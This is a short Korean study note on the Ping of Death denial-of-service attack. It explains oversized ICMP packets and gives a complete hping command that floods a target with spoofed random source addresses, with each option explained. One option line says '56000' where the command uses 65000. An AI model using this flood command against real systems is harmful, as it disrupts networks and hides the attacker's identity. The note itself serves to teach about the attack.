PoD 공격

• PoD - Ping of Death
• 규정 크기 이상의 ICMP 패킷으로 시스템을 마비시키는 공격
• 프로토콜의 허용 범위 이상의 ICMP Echo Request 패킷을 원격 IP 주소에 송신하게 되면 허용범위 이상의 응답을 받게되면서 버퍼 오버플로우를 발생시켜 공격대상의 IP스택을 넘치게 만드는 원리

 

hping --icmp --rand-source [Target IP] -d 65000 --flood

• hping : PoD의 공격을 위해 사용하는 패키지
• —icmp : 패킷의 종류를 ICMP로 선택하는 옵션값
• —rand-source : 공격자의 IP주소를 랜덤하게 생성해주는 옵션값
• -d 56000 : 전송하는 패킷의 길이를 65000 Byte로 설정(max. 65535Byte)
• —flood : 시스템이 생성가능한 만큼 최대한 빠른 속도로 패킷을 보내는 옵션값

---

참고 자료

[DoS Attack] Smurf, Land, POD 공격기법